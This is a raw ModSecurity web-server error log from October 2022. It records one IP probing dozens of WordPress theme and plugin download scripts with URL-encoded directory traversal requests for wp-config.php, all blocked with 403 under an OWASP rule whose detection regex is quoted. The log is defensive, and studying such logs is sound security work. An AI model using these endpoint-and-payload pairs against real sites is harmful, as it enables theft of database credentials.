/wp-content/themes/hfr/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hfr/download.php"] [unique_id "Y0ZxV-LrJ0tgpRmNRAaHogAAAMs"] [Wed Oct 12 02:48:40.134107 2022] [:error] [pid 22339:tid 140534450468608] [client 185.189.115.30:49918] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "Y0ZxWNmZws0mEkXxGo-VSAAAAIk"] [Wed Oct 12 02:48:40.286371 2022] [:error] [pid 22972:tid 140534564054784] [client 185.189.115.30:49920] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "Y0ZxWOLrJ0tgpRmNRAaHowAAAMQ"] [Wed Oct 12 02:48:40.440581 2022] [:error] [pid 22337:tid 140534442075904] [client 185.189.115.30:49922] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yaml-green/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yaml-green/download.php"] [unique_id "Y0ZxWKBKlkjFPqrcdjM3rwAAAAo"] [Wed Oct 12 02:48:40.591355 2022] [:error] [pid 22338:tid 140534572447488] [client 185.189.115.30:49924] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/itchyrobot_parent/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/itchyrobot_parent/download.php"] [unique_id "Y0ZxWGINFIoIk7hPzpaZJwAAAEM"] [Wed Oct 12 02:48:40.754342 2022] [:error] [pid 22972:tid 140534450468608] [client 185.189.115.30:49926] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mh-magazine-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mh-magazine-lite/down.php"] [unique_id "Y0ZxWOLrJ0tgpRmNRAaHpAAAAMk"] [Wed Oct 12 02:48:40.904851 2022] [:error] [pid 22338:tid 140534564054784] [client 185.189.115.30:49928] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/seacad/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/seacad/inc/download.php"] [unique_id "Y0ZxWGINFIoIk7hPzpaZKAAAAEQ"] [Wed Oct 12 02:48:41.056039 2022] [:error] [pid 22972:tid 140534442075904] [client 185.189.115.30:49930] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/theme-wpaitaliadigitale-full/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/theme-wpaitaliadigitale-full/down.php"] [unique_id "Y0ZxWeLrJ0tgpRmNRAaHpQAAAMo"] [Wed Oct 12 02:48:41.219621 2022] [:error] [pid 22972:tid 140534416897792] [client 185.189.115.30:49932] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jamesaltucher/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jamesaltucher/download.php"] [unique_id "Y0ZxWeLrJ0tgpRmNRAaHpgAAAM0"] [Wed Oct 12 02:48:41.370467 2022] [:error] [pid 22972:tid 140534349756160] [client 185.189.115.30:49934] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "Y0ZxWeLrJ0tgpRmNRAaHpwAAANU"] [Wed Oct 12 02:48:41.792108 2022] [:error] [pid 22337:tid 140534484039424] [client 185.189.115.30:49936] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "Y0ZxWaBKlkjFPqrcdjM3sAAAAAU"] [Wed Oct 12 02:48:41.943188 2022] [:error] [pid 22972:tid 140534458861312] [client 185.189.115.30:49938] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quark/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quark/download.php"] [unique_id "Y0ZxWeLrJ0tgpRmNRAaHqAAAAMg"] [Wed Oct 12 02:48:42.094359 2022] [:error] [pid 22338:tid 140534391719680] [client 185.189.115.30:49942] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/todays/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/todays/download.php"] [unique_id "Y0ZxWmINFIoIk7hPzpaZKgAAAFA"] [Wed Oct 12 02:48:42.249249 2022] [:error] [pid 22972:tid 140534324578048] [client 185.189.115.30:49944] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/banftheme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/banftheme/download.php"] [unique_id "Y0ZxWuLrJ0tgpRmNRAaHqQAAANg"] [Wed Oct 12 02:48:42.405468 2022] [:error] [pid 22337:tid 140534589232896] [client 185.189.115.30:49946] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/placid/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/placid/download.php"] [unique_id "Y0ZxWqBKlkjFPqrcdjM3sQAAAAE"] [Wed Oct 12 02:48:42.560964 2022] [:error] [pid 22338:tid 140534374934272] [client 185.189.115.30:49948] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/metz/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/metz/download.php"] [unique_id "Y0ZxWmINFIoIk7hPzpaZKwAAAFI"] [Wed Oct 12 02:48:42.733092 2022] [:error] [pid 22339:tid 140534564054784] [client 185.189.115.30:49950] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/caledobio/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/caledobio/framework/utilities/download/getfile.php"] [unique_id "Y0ZxWtmZws0mEkXxGo-VSQAAAIQ"] [Wed Oct 12 02:48:42.883732 2022] [:error] [pid 22339:tid 140534597625600] [client 185.189.115.30:49952] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mingle/framework/utilities/download/getfile.php"] [unique_id "Y0ZxWtmZws0mEkXxGo-VSgAAAIA"] [Wed Oct 12 02:48:43.035203 2022] [:error] [pid 22339:tid 140534475646720] [client 185.189.115.30:49954] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/accesspress-store/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/accesspress-store/download.php"] [unique_id "Y0ZxW9mZws0mEkXxGo-VSwAAAIY"] [Wed Oct 12 02:48:43.193988 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:49956] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "Y0ZxW-LrJ0tgpRmNRAaHqgAAAMU"] [Wed Oct 12 02:48:43.344875 2022] [:error] [pid 22337:tid 140534425290496] [client 185.189.115.30:49958] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/haarperfect/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/haarperfect/framework/utilities/download/getfile.php"] [unique_id "Y0ZxW6BKlkjFPqrcdjM3sgAAAAw"] [Wed Oct 12 02:48:43.517999 2022] [:error] [pid 22337:tid 140534341363456] [client 185.189.115.30:49960] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "Y0ZxW6BKlkjFPqrcdjM3swAAABY"] [Wed Oct 12 02:48:44.490702 2022] [:error] [pid 22337:tid 140534564054784] [client 185.189.115.30:49964] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y0ZxXKBKlkjFPqrcdjM3tQAAAAQ"] [Wed Oct 12 02:48:44.656856 2022] [:error] [pid 22337:tid 140534383326976] [client 185.189.115.30:49966] [client 